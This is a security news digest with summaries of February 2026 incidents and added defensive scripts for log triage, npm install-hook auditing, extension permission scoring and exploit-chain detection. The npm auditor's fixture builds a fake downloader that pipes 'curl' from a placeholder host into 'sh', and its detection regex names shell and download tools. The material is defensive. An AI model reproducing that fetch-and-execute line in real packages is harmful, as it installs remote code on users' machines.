Daily Brief

Articles are listed below with machine-generated summaries

Total articles found: 12586

Checks for new stories every ~15 minutes

2026-02-14 16:13:37 bleepingcomputer VULNERABILITIES Single Threat Actor Dominates Ivanti Endpoint Manager Exploitations
A single threat actor is behind 83% of recent attacks on Ivanti Endpoint Manager Mobile (EPMM), exploiting CVE-2026-21962 and CVE-2026-24061, which allow unauthenticated remote code execution. Ivanti has issued hotfixes, with full patches expected in the first quarter. GreyNoise attributed the majority of exploitation attempts to a single IP address, 193[.]24[.]123[.]42, hosted on bulletproof infrastructure operated by PROSPERO OOO. On February 8 that address generated 269 sessions, far above its daily average. The attempts use OAST-style DNS callbacks to confirm that payloads executed, a pattern consistent with an initial access broker validating targets. Because the IP is not widely listed in public IoC feeds, blocklists built from those feeds may miss it, so defenders should check their own EPMM logs for it directly. The same infrastructure also targets vulnerabilities in Oracle WebLogic, GNU Inetutils telnetd, and GLPI, indicating a broad, opportunistic exploitation campaign. Ivanti advises applying its hotfix RPM packages as a temporary mitigation and recommends building a replacement EPMM instance until full patches are released.
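The article's practical point is that the reported address is absent from most public IoC feeds and that its activity showed up as a one-day session spike. The script below, an added example that is not from GreyNoise or Ivanti, does both checks over an access log: it matches requests against an IoC set and flags any day whose request count sits far above a leave-one-out baseline of the other days. The IP is the one named in the report; every log line, path and internal address is constructed sample data.

```python
"""Session-spike and IoC check over an access log.

Added example, not from GreyNoise or Ivanti. HOSTILE_IPS holds the address
named in the report; all log lines below are constructed, with made-up paths.
"""
import re
from collections import Counter
from statistics import mean, pstdev

HOSTILE_IPS = {"193.24.123.42"}  # reported IoC; extend from your own intel

# Constructed baseline traffic: three sessions a day from internal clients.
BASELINE_LINES = """\
2026-02-05T09:12:01Z 10.0.0.5 GET /portal/login 200
2026-02-05T11:40:22Z 10.0.0.7 GET /portal/login 200
2026-02-05T15:03:09Z 10.0.0.9 POST /portal/login 302
2026-02-06T08:55:41Z 10.0.0.5 GET /portal/login 200
2026-02-06T12:17:30Z 10.0.0.11 GET /portal/login 200
2026-02-06T19:48:03Z 10.0.0.7 POST /portal/login 302
2026-02-07T10:02:55Z 10.0.0.9 GET /portal/login 200
2026-02-07T13:26:14Z 10.0.0.5 GET /portal/login 200
2026-02-07T17:31:47Z 10.0.0.11 POST /portal/login 302
2026-02-08T09:05:12Z 10.0.0.5 GET /portal/login 200
2026-02-08T14:22:38Z 10.0.0.7 GET /portal/login 200
2026-02-08T16:40:59Z 10.0.0.9 POST /portal/login 302
""".splitlines()

# Constructed burst: twenty hits from the reported IP on February 8.
SPIKE_LINES = [
    f"2026-02-08T02:{minute:02d}:03Z 193.24.123.42 POST /portal/api/object 500"
    for minute in range(20)
]
SAMPLE_LINES = BASELINE_LINES + SPIKE_LINES

LINE_RE = re.compile(
    r"^(?P<day>\d{4}-\d{2}-\d{2})T\S+ (?P<ip>\S+) (?P<method>\S+) "
    r"(?P<path>\S+) (?P<status>\d{3})$"
)


def parse(lines):
    """Yield one dict per well-formed line; silently skip anything else."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield m.groupdict()


def hostile_requests(lines, hostile=HOSTILE_IPS):
    """Every request from an IoC address, however few: one hit is enough to triage."""
    return [r for r in parse(lines) if r["ip"] in hostile]


def sessions_per_day(lines):
    """Request count per calendar day, in date order."""
    counts = Counter(r["day"] for r in parse(lines))
    return dict(sorted(counts.items()))


def spike_days(counts, k=3.0):
    """Flag days whose count exceeds a leave-one-out baseline.

    The baseline is the mean of the *other* days plus k standard deviations;
    when the other days are flat (sigma == 0) fall back to three times their
    mean. Needs at least three days of data to say anything.
    """
    flagged = []
    for day, n in counts.items():
        others = [v for d, v in counts.items() if d != day]
        if len(others) < 2:
            continue
        mu, sigma = mean(others), pstdev(others)
        threshold = mu + k * sigma if sigma > 0 else 3 * mu
        if n > threshold:
            flagged.append((day, n, round(mu, 1)))
    return flagged


def top_sources(lines, day, limit=3):
    """Which addresses drove a given day's traffic."""
    return Counter(r["ip"] for r in parse(lines) if r["day"] == day).most_common(limit)


if __name__ == "__main__":
    for day, n, baseline in spike_days(sessions_per_day(SAMPLE_LINES)):
        print(f"{day}: {n} sessions vs baseline {baseline} -> {top_sources(SAMPLE_LINES, day)}")
    print(f"{len(hostile_requests(SAMPLE_LINES))} requests from known-hostile addresses")
```

The IoC match and the spike check are deliberately independent: a single request from a known-hostile address is worth triage even with no volume anomaly, and a spike from an address missing from every feed is exactly the case the article describes. Feed the functions your real log lines after adjusting LINE_RE to your format.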
2026-02-14 15:20:58 bleepingcomputer CYBERCRIME Physical Mail Phishing Targets Trezor and Ledger Wallet Users
Threat actors are mailing physical letters that impersonate Trezor and Ledger and urge recipients to submit their wallet recovery phrases. The letters pose as official communications and pressure users to complete an "Authentication" or "Transaction" check by scanning a QR code that leads to a phishing site mimicking the vendors' setup pages; anyone who enters a recovery phrase there hands the attacker full control of the wallet. Earlier data breaches at both vendors exposed customer contact information and may have supplied the mailing lists. Phishing by physical mail is rare compared with email and shows the tactic evolving. A recovery phrase should never be shared or typed into anything other than the hardware wallet itself; Trezor and Ledger both state that they will never ask for it.
2026-02-13 22:36:48 bleepingcomputer CYBERCRIME North Korean Fake Recruiters Target Developers with Malicious Coding Challenges
North Korean threat actors are targeting JavaScript and Python developers with fake job offers whose "coding challenges" deliver malware. The campaign, tracked as 'Graphalgo', sets up fake companies in the blockchain and crypto-trading sectors to lure victims and hosts malicious packages on npm and PyPI that act as downloaders for a remote access trojan (RAT). Researchers identified 192 malicious packages; the campaign's modular structure lets it resume quickly after some of its packages are taken down. The RAT executes arbitrary commands, exfiltrates files, and targets the MetaMask cryptocurrency extension, indicating a financial motive. The operation is attributed to the Lazarus group, whose cryptocurrency-focused tactics it matches. Developers who installed these packages are advised to rotate tokens, change passwords, and reinstall their operating systems.
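Packages that act as downloaders typically run at install time through npm lifecycle hooks. The audit below, an added example that is not from the researchers' report, walks a node_modules tree, reports every preinstall/install/postinstall/prepare hook, and flags hooks whose command or referenced local script contains fetch-decode-execute primitives. The package names, the fixture tree and the documentation-range address 198.51.100.7 are constructed; none of the 192 reported packages is named here.

```python
"""Audit installed npm packages for install-time hooks.

Added example, not from the researchers' report. Package names, the
documentation-range IP 198.51.100.7 and the fixture tree are constructed.
"""
import json
import pathlib
import re
import tempfile

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Primitives a loader needs: fetch something, decode it, execute it.
SUSPICIOUS = re.compile(
    r"\bcurl\b|\bwget\b|powershell|Invoke-WebRequest|base64|\beval\(|node\s+-e\b"
    r"|child_process|https?://\d{1,3}(?:\.\d{1,3}){3}",
    re.IGNORECASE,
)
LOCAL_SCRIPT = re.compile(r"[\w./-]+\.(?:c?js|mjs|sh)\b")


def audit_node_modules(root):
    """Return one finding per lifecycle hook found under root.

    A hook is reported even when it looks clean (the practitioner should know it
    exists); ``flags`` says why it deserves a closer look.
    """
    findings = []
    for manifest in sorted(pathlib.Path(root).rglob("package.json")):
        try:
            pkg = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue
        scripts = pkg.get("scripts") or {}
        for hook in LIFECYCLE_HOOKS:
            cmd = scripts.get(hook)
            if not cmd:
                continue
            flags = []
            if SUSPICIOUS.search(cmd):
                flags.append("hook command itself fetches/decodes/executes")
            # Follow local script files the hook runs, e.g. "node setup.js".
            for name in LOCAL_SCRIPT.findall(cmd):
                target = manifest.parent / name
                if target.is_file() and SUSPICIOUS.search(target.read_text(errors="ignore")):
                    flags.append(f"{name} uses network/exec primitives")
            findings.append({
                "package": pkg.get("name", manifest.parent.name),
                "hook": hook,
                "command": cmd,
                "flags": flags,
            })
    return findings


def build_fixture():
    """Constructed node_modules tree: one clean package, one downloader."""
    root = pathlib.Path(tempfile.mkdtemp()) / "node_modules"
    clean = root / "tiny-util"
    clean.mkdir(parents=True)
    (clean / "package.json").write_text(json.dumps(
        {"name": "tiny-util", "version": "1.0.0", "scripts": {"test": "node test.js"}}))
    loader = root / "graph-helper"  # constructed name, not a real package
    loader.mkdir()
    (loader / "package.json").write_text(json.dumps(
        {"name": "graph-helper", "version": "0.3.1",
         "scripts": {"postinstall": "node setup.js"}}))
    (loader / "setup.js").write_text(
        'const { exec } = require("child_process");\n'
        'exec("curl -s http://198.51.100.7/s | sh");\n')
    return root


if __name__ == "__main__":
    for f in audit_node_modules(build_fixture()):
        print(f"{f['package']}: {f['hook']} -> {f['command']!r} {f['flags']}")
```

Run it against a project's real node_modules after a `npm install`, or better, before one by installing with `--ignore-scripts` and auditing first. The hook list is reported in full because a loader whose primitives live in a file the regex does not catch still shows up as an unexpected postinstall on a package that has no reason to need one.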
2026-02-13 20:22:57 bleepingcomputer MALWARE Mac Infostealer Malware Campaign Exploits Claude Artifacts and Google Ads
Threat actors are targeting macOS users with ClickFix campaigns that use Claude artifacts and Google Ads to deliver infostealer malware. More than 10,000 users have reached the malicious content, which instructs them to paste and run a shell command in Terminal. Two variants were identified, both ending in the MacSync infostealer, which collects sensitive system information. The malware communicates with its command-and-control server using a hardcoded token and API key and disguises its traffic with a macOS browser user-agent. Stolen data is archived and exfiltrated to the attacker's server, with failed uploads retried several times. Researchers at Moonlock Lab and AdGuard link the attacks to a single threat actor. Users are advised never to run unfamiliar commands in Terminal and to check what a command does before executing it, for example by asking a chatbot. The campaign extends a trend of abusing large language model platforms to host malicious content, seen previously with ChatGPT and Grok.
2026-02-13 18:50:30 theregister VULNERABILITIES Critical Microsoft SQL Injection Vulnerability Actively Exploited
A critical SQL injection flaw in Microsoft Configuration Manager, CVE-2024-43468, is now being actively exploited, putting unpatched businesses and government agencies at risk. Rated CVSS 9.8, it allows unauthenticated remote attackers to execute commands on the server and its database, so patching is urgent. CISA has added the flaw to its Known Exploited Vulnerabilities catalog and requires federal agencies to patch by March 5. Discovered by Synacktiv's Mehdi Elyassa, the flaw was initially rated "exploitation less likely" by Microsoft, but public proof-of-concept exploits have since appeared and exploitation has been observed. Microsoft has not commented on the scale of exploitation or the number of affected customers. The urgency is heightened by other recently disclosed exploited CVEs; Microsoft released 59 new CVEs this month alone. Organizations should prioritize patching this vulnerability.
2026-02-13 18:35:25 bleepingcomputer DATA BREACH Luxury Brands Fined $25 Million for Major Data Breaches
South Korea's Personal Information Protection Commission (PIPC) fined Louis Vuitton, Dior, and Tiffany a combined $25 million for inadequate security measures that led to breaches affecting more than 5.5 million customers. The breaches, all involving unauthorized access to cloud-based customer management systems, exposed names, contact details, and purchase histories. Louis Vuitton's breach stemmed from malware on an employee's device that compromised its SaaS platform, affecting 3.6 million customers; it was fined $16.4 million. Dior's breach began with a phishing attack on a customer service employee and exposed 1.95 million customers' data; it was fined $9.4 million for delayed breach notification and weak security practices. Tiffany's breach, which started with voice phishing, affected 4,600 clients and drew a $1.85 million fine for similar lapses and notification delays. The PIPC stressed that outsourcing to SaaS does not transfer responsibility for protecting client data, and called for robust access controls and timely breach notification.
2026-02-13 17:27:59 thehackernews NATION STATE ACTIVITY Google Uncovers Russian-Linked CANFAIL Malware Targeting Ukraine
Google Threat Intelligence Group has identified a new threat actor linked to Russian intelligence that targets Ukrainian defense, military, and government organizations with CANFAIL malware. The actor has widened its targeting to aerospace, nuclear, and chemical research organizations and to international humanitarian aid groups involved in the Ukraine conflict. Despite limited resources, the group has extended its capabilities by using large language models for reconnaissance, social engineering, and command-and-control setup. Recent phishing campaigns impersonate Ukrainian and Romanian energy organizations to compromise email accounts and distribute malware. The attack chain uses LLM-generated lures and Google Drive links to deliver CANFAIL, JavaScript disguised as a PDF that launches a PowerShell dropper. The actor is also tied to the PhantomCaptcha campaign, whose phishing emails target Ukraine's war relief efforts with a WebSocket-based trojan. The activity shows the cyber threat against Ukraine persisting and adapting, and the need for robust defenses and international cooperation.
2026-02-13 16:31:14 thehackernews NATION STATE ACTIVITY Google Reports State-Sponsored Cyber Operations Targeting Defense Sector
Google Threat Intelligence Group reports state-sponsored activity from China, Iran, North Korea, and Russia against the defense industrial base (DIB). The operations focus on defense entities involved in the Russia-Ukraine conflict, abuse hiring processes, and target edge devices for initial access. Both hacktivists and state-sponsored groups show interest in autonomous vehicles and drones, reflecting their growing role in modern warfare. Chinese threat groups route reconnaissance through operational relay box (ORB) networks, complicating detection and attribution. The sector also faces extortion and disruption from financially motivated actors. Google warns that the persistent volume of intrusions and the targeting of defense personnel are significant threats, and calls for enhanced security measures and vigilance across the sector.
2026-02-13 15:30:57 thehackernews MALWARE New VoidLink Malware Targets Tech and Financial Sectors
Cisco Talos has identified a new threat actor, UAT-9921, deploying the VoidLink malware against technology and financial services organizations and using compromised hosts as command-and-control infrastructure. VoidLink is a modular malware framework built for stealthy, long-term access to Linux-based cloud environments, with components written in Zig, C, and Go. It includes kernel-level rootkits, anti-forensics, and EDR evasion, lowering the skill needed to run sophisticated intrusions. UAT-9921 appears to have Chinese-language proficiency, and development may be split across several teams, suggesting a structured operation. The framework's role-based access control hints at possible use in red team exercises, but its capabilities are a serious concern regardless. A compile-on-demand feature lets it adapt quickly to different Linux distributions. Observed use dates back to September 2025, a longer operational history than first thought.
2026-02-13 15:23:52 bleepingcomputer MISCELLANEOUS IBM QRadar Integrates Criminal IP for Enhanced Threat Intelligence
Criminal IP, an AI-powered threat intelligence platform, is now integrated with IBM QRadar SIEM and SOAR. The integration brings external, IP-based threat intelligence into QRadar workflows: firewall traffic logs can be analyzed in real time, with IP addresses automatically classified by risk level to help prioritize response. Analysts can open detailed threat reports on an IP without leaving QRadar. On the SOAR side, the integration automates threat enrichment during incident response, reducing manual lookups. The stated goals are higher detection accuracy, shorter investigation cycles, and better response prioritization; the integration reflects the broader move toward real-time, exposure-based intelligence in SOC tooling.
2026-02-13 12:42:34 bleepingcomputer VULNERABILITIES CISA Alerts on Exploited Microsoft SCCM Vulnerability CVE-2024-43468
CISA has confirmed active exploitation of a critical vulnerability in Microsoft Configuration Manager (SCCM) and ordered U.S. federal agencies to patch. CVE-2024-43468 is a SQL injection flaw that lets remote attackers execute arbitrary commands with high privileges. Microsoft initially rated it "Exploitation Less Likely," but Synacktiv's release of proof-of-concept code changed that assessment. Under Binding Operational Directive 22-01, federal agencies must remediate by March 5, 2026. CISA advises all network defenders, including private sector organizations, to apply the vendor's mitigations or discontinue use of the product if they cannot. The case underscores the need for continuous monitoring and prompt patching of IT infrastructure.
2026-02-13 11:51:02 theregister DATA BREACH Odido Data Breach Exposes Personal Details of 6.2 Million Customers
Odido, a major Dutch telecom provider, disclosed a breach affecting 6.2 million customers. Exposed data includes names, addresses, phone numbers, email addresses, dates of birth, bank account numbers, and ID document details; passwords and call records were not affected. The breach was detected over the weekend of February 7-8 and reported immediately to the Dutch Data Protection Authority. Odido is notifying affected customers by email and SMS with a personalized list of the data exposed and guidance on likely scams. The company warns that the data could be used for impersonation, urging customers to verify callers' identities and to treat unexpected invoices with suspicion. CEO Søren Abildgaard confirmed that services are unaffected, and the company has brought in external security specialists to strengthen its defenses and prevent a repeat.
2026-02-13 11:27:36 thehackernews MALWARE Malicious Chrome Extensions Exploit Users for Data Theft and Control
Researchers have identified a malicious Chrome extension, CL Suite by @CLMasters, that steals data from Meta Business Suite and Facebook Business Manager, exfiltrating TOTP codes and business analytics to attacker-controlled infrastructure and enabling account takeover; only 33 users are affected so far, but the technique could scale. A separate campaign, VK Styles, hijacked 500,000 VKontakte accounts through extensions that silently change user settings and maintain persistent control. AiFrame, another operation, uses 32 AI-themed extensions to siphon data, including Gmail content and browsing activity, from more than 260,000 users. A further report found 287 Chrome extensions exfiltrating browsing history to data brokers across 37.4 million installations. Users and organizations should install only necessary, well-reviewed extensions, audit installed extensions regularly for unexpected permissions or behavior, and use separate browser profiles for sensitive activities; extensions remain a ready conduit for data theft and unauthorized access.
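The one audit a user can actually perform is to read the manifest: an extension that styles pages has no reason to hold the cookies permission on every site, and that combination is what makes session and TOTP theft as described above possible. The script below is an added example, not from any of the cited reports; it scores a manifest by what its permissions would let a hostile update do, and can scan a copied Extensions folder. The two manifests and the weights are this example's own constructed triage heuristic, not a Chrome Web Store policy.

```python
"""Score Chrome extension manifests by the damage their permissions allow.

Added example, not from the researchers' reports. The manifests and the
weights are constructed for illustration.
"""
import json
import pathlib
import re

# Weights reflect what the permission lets an extension do once it turns hostile.
RISKY_PERMISSIONS = {
    "cookies": 5,             # read session cookies for any granted host
    "debugger": 5,            # drive pages via the DevTools protocol
    "webRequest": 4,          # observe all traffic
    "webRequestBlocking": 4,  # modify or redirect traffic
    "nativeMessaging": 4,     # talk to a native binary outside the sandbox
    "history": 3,
    "scripting": 3,           # inject code into pages
    "clipboardRead": 3,
    "management": 3,          # enumerate or disable other extensions
    "tabs": 2,                # URLs and titles of every tab
    "declarativeNetRequest": 2,
}
BROAD_HOST = re.compile(r"^(<all_urls>|\*://\*/\*|https?://\*/\*)$")


def host_patterns(manifest):
    """Host access from MV3 host_permissions plus MV2-style entries in permissions."""
    perms = manifest.get("permissions", [])
    hosts = set(manifest.get("host_permissions", []))
    hosts.update(p for p in perms if "://" in p or p == "<all_urls>")
    return hosts


def assess(manifest):
    """Return (score, reasons) for one parsed manifest."""
    score, reasons = 0, []
    perms = set(manifest.get("permissions", []))
    for p in sorted(perms & RISKY_PERMISSIONS.keys()):
        score += RISKY_PERMISSIONS[p]
        reasons.append(f"permission {p}")
    broad = any(BROAD_HOST.match(h) for h in host_patterns(manifest))
    if broad:
        score += 5
        reasons.append("host access to every site")
    if any(BROAD_HOST.match(m)
           for cs in manifest.get("content_scripts", []) for m in cs.get("matches", [])):
        score += 3
        reasons.append("content script injected on every site")
    if broad and "cookies" in perms:
        score += 5  # the combination that makes session theft trivial
        reasons.append("cookies on every site: session theft capable")
    return score, reasons


def verdict(score):
    return "high" if score >= 12 else "medium" if score >= 6 else "low"


def audit_directory(extensions_dir):
    """Scan every manifest.json under a copy of a profile's Extensions folder."""
    results = {}
    for manifest_path in pathlib.Path(extensions_dir).rglob("manifest.json"):
        manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        score, reasons = assess(manifest)
        results[manifest.get("name", manifest_path.parent.name)] = (verdict(score), reasons)
    return results


# Constructed manifests: a "styling" extension asking for far more than styling
# needs, and a notes extension scoped to a single host.
STYLER_MANIFEST = {
    "manifest_version": 3, "name": "Page Styler",
    "permissions": ["cookies", "webRequest", "tabs", "scripting", "storage"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"]}],
}
NOTES_MANIFEST = {
    "manifest_version": 3, "name": "Notes Sync",
    "permissions": ["storage"],
    "host_permissions": ["https://notes.example/*"],
}

if __name__ == "__main__":
    for m in (STYLER_MANIFEST, NOTES_MANIFEST):
        score, reasons = assess(m)
        print(f"{m['name']}: {verdict(score)} ({score}) {reasons}")
```

The score is a triage aid, not a verdict on intent: a password manager legitimately needs broad host access. What it surfaces is the mismatch between an extension's stated purpose and what it could do after a malicious update, which is the point at which a separate profile for sensitive accounts pays off.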
2026-02-13 10:48:55 thehackernews VULNERABILITIES npm Implements Security Overhaul to Mitigate Supply Chain Risks
npm has overhauled its authentication in response to supply-chain attacks such as Sha1-Hulud, replacing long-lived tokens with short-lived, identity-bound credentials. Gaps remain: MFA on publishing is still optional, and tokens used for automation can still bypass it, which keeps a token-theft path open. The compromise of the chalk package showed how MFA-protected accounts fall to phishing when maintainers are tricked into entering their credentials and one-time passwords on an attacker's page. Short-lived tokens narrow the window in which a stolen credential is useful, but the automation bypass remains a significant risk. Chainguard argues for building npm packages from verifiable upstream source, noting that 98.5% of malicious packages contained code that was not present in the upstream repository; Chainguard Libraries for JavaScript apply this approach. Organizations are encouraged to layer npm's new controls with MFA and additional tooling rather than rely on any single measure.
2026-02-13 08:40:01 thehackernews VULNERABILITIES Critical BeyondTrust Vulnerability Exploited, Prompting Urgent Patching Efforts
Threat actors are exploiting CVE-2026-1731, a critical vulnerability in BeyondTrust Remote Support and Privileged Remote Access that allows unauthorized remote code execution. Successful exploitation can lead to unauthorized access, data exfiltration, and service disruption. The observed attack chain first retrieves the x-ns-company value via get_portal_info, then opens a WebSocket channel to carry out the rest of the attack. BeyondTrust has released patches and urges immediate updating, and CISA has added the flaw to its Known Exploited Vulnerabilities catalog. The speed of weaponization, from disclosure to in-the-wild exploitation, shows how short the window to patch internet-facing appliances has become, and why patch management needs to be paired with monitoring.
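The described chain has a detectable shape: a get_portal_info request followed shortly by a WebSocket upgrade from the same source. The correlator below is an added example, not from BeyondTrust or the researchers who published the chain; it keeps one timestamp per source and alerts when the upgrade lands within a window. The log format, the /api/get_portal_info and /ws paths, and all addresses (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges) are constructed.

```python
"""Correlate a get_portal_info request with a WebSocket upgrade from the same source.

Added example, not from BeyondTrust or the researchers. Log format, paths and
addresses are constructed; adjust LINE_RE to your appliance's actual log.
"""
import re
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d{3})"
    r"(?: upgrade=(?P<upgrade>\S+))?$"
)

# Constructed sample: a fast probe-then-upgrade, a slow one, and two unrelated hosts.
SAMPLE_LOG = """\
2026-02-12T03:14:05Z 203.0.113.9 GET /api/get_portal_info 200
2026-02-12T03:14:07Z 203.0.113.9 GET /ws 101 upgrade=websocket
2026-02-12T08:00:01Z 198.51.100.20 GET /api/get_portal_info 200
2026-02-12T08:30:44Z 198.51.100.20 GET /ws 101 upgrade=websocket
2026-02-12T09:15:32Z 10.0.0.3 GET /api/get_portal_info 200
2026-02-12T09:16:00Z 10.0.0.4 GET /ws 101 upgrade=websocket
""".splitlines()


def parse(lines):
    """Yield parsed records with a timezone-aware timestamp; skip malformed lines."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))
        yield rec


def correlate(lines, window_seconds=120):
    """Alert when a source calls get_portal_info and upgrades to WebSocket within the window.

    State is one timestamp per source IP: its most recent get_portal_info call.
    A legitimate client can produce the same sequence, so treat hits as triage
    candidates and check the source against expected client ranges.
    """
    last_probe = {}
    alerts = []
    for rec in parse(lines):
        if "get_portal_info" in rec["path"]:
            last_probe[rec["ip"]] = rec["ts"]
            continue
        is_upgrade = rec["status"] == "101" or (rec["upgrade"] or "").lower() == "websocket"
        probe = last_probe.get(rec["ip"])
        if is_upgrade and probe is not None:
            delta = (rec["ts"] - probe).total_seconds()
            if delta <= window_seconds:
                alerts.append({
                    "ip": rec["ip"],
                    "delta_s": delta,
                    "probe_at": probe.isoformat(),
                    "upgrade_at": rec["ts"].isoformat(),
                })
                del last_probe[rec["ip"]]  # one alert per probe
    return alerts


if __name__ == "__main__":
    for a in correlate(SAMPLE_LOG):
        print(f"{a['ip']}: portal probe then WebSocket upgrade {a['delta_s']:.0f}s later")
```

Tune the window against a day of normal traffic before relying on it; the value of the rule is less the sequence itself than the sequence arriving from an address that never previously used the portal.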